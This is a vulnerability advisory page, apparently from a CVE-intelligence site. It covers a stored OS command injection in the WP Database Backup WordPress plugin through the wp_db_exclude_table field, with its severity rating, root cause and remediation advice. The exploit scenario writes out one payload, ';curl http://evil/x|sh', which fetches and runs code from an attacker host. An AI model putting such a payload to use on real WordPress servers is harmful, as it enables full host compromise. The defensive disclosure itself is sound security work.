Severity by source
AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Payload is delivered over the network (AV:N) with low complexity, but requires administrator privileges (PR:H) and no user interaction; command execution yields full host compromise, so C/I/A all High.
Primary rating from Vendor (Wordfence).
CVSS VectorVendor: Wordfence
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
2DescriptionCVE.org
The WP Database Backup - Unlimited Database & Files Backup by Backup for WP plugin for WordPress is vulnerable to OS Command Injection in all versions up to and including 7.11 via the wp_db_exclude_table parameter. This is due to the direct concatenation of user-supplied $_POST['wp_db_exclude_table'] values into the mysqldump shell command string in the mysqldump() function of includes/admin/class-wpdb-admin.php without wrapping them in escapeshellarg()-every other argument in the same command (DB_USER, DB_PASSWORD, host, filename, DB_NAME) is properly escaped, making the exclude-table values the sole exception-and because the only applied filtering, sanitize_text_field() via recursive_sanitize_text_field(), strips HTML tags but leaves shell metacharacters such as ;, |, ` `, and $() intact. This makes it possible for authenticated attackers, with administrator-level access and above, to execute arbitrary operating system commands on the server, potentially enabling full remote code execution. The injection is stored: malicious values submitted through the plugin settings form are persisted to the WordPress options table via update_option('wp_db_exclude_table') and later retrieved with get_option() and passed unsanitized to shell_exec()` whenever a backup operation runs.
AnalysisAI
Authenticated OS command injection in the WP Database Backup plugin for WordPress (all versions up to and including 7.11) lets administrator-level users execute arbitrary operating system commands on the underlying server, escalating a WordPress admin foothold into full host RCE. The flaw stems from the wp_db_exclude_table POST parameter being concatenated unescaped into the mysqldump shell command; the injection is stored, so payloads persist in the options table and fire whenever a backup runs. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires an authenticated WordPress account with administrator-level privileges or above (CVSS PR:H), and requires that the target has the WP Database Backup plugin (version ≤ 7.11) installed and active. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 base score of 7.2 (High) with vector AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H reflects the defining trade-off: network-reachable and low-complexity, but gated behind PR:H - the attacker must already hold administrator-level WordPress access. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who has obtained WordPress administrator credentials (via phishing, credential reuse, or a lower-privilege escalation) opens the WP Database Backup settings page and submits an exclude-table value containing a shell payload such as ';curl http://evil/x|sh'. Because the value is stored and only tag-sanitized, it persists and executes with the web server's privileges the next time any backup job runs, giving the attacker OS command execution. … |
| Remediation | No vendor-released patched version is identified in the provided data; a WordPress plugin trac changeset (3574273) is referenced (https://plugins.trac.wordpress.org/changeset?reponame=&old=3574273%40wp-database-backup&new=3574273%40wp-database-backup) which may contain the fix, but a specific fixed release version is not independently confirmed here - administrators should consult the Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/0a97a217-b00b-4268-a472-8d62ae1d18e3?source=cve) and update to the latest plugin release once a fixed version is published. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: inventory all WordPress deployments for WP Database Backup plugin presence (versions ≤7.11); audit WordPress admin account access logs for suspicious backup-related activity; disable the plugin if not critical to operational requirements. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same weakness CWE-77 – Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-41262
GHSA-9g3c-r4j4-8m9r